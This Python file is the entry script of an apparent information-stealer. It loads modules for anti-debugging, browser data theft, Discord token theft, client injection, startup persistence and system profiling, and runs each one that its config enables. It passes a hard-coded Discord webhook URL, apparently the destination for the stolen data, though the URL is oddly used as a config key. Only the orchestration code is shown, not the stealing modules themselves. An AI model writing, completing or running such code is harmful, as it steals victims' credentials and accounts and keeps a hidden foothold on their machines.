from components.antidebug import AntiDebug
from components.browsers import Browsers
from components.discordtoken import DiscordToken
from components.injection import Injection
from components.startup import Startup
from components.systeminfo import SystemInfo
from config import __CONFIG__


def main():
    funcs = [
        AntiDebug,
        Browsers,
        DiscordToken,
        Injection,
        Startup,
        SystemInfo,
    ]

    for func in funcs:
        if __CONFIG__[func.__name__.lower()]:
            try:
                if func.__init__.__code__.co_argcount == 2:
                    func(__CONFIG__['https://discord.com/api/webhooks/1348751775829594193/Z7d6r0S9uQj9pt8fxSO61Noj5Z3F1GwaEXm-k_iaOIPC0ZfOziR_1INcITvrPILZPBhD'])
                else:
                    func()

            except Exception as e:
                print(f'Error in {func.__name__}: {e}')


if __name__ == '__main__':
    main()
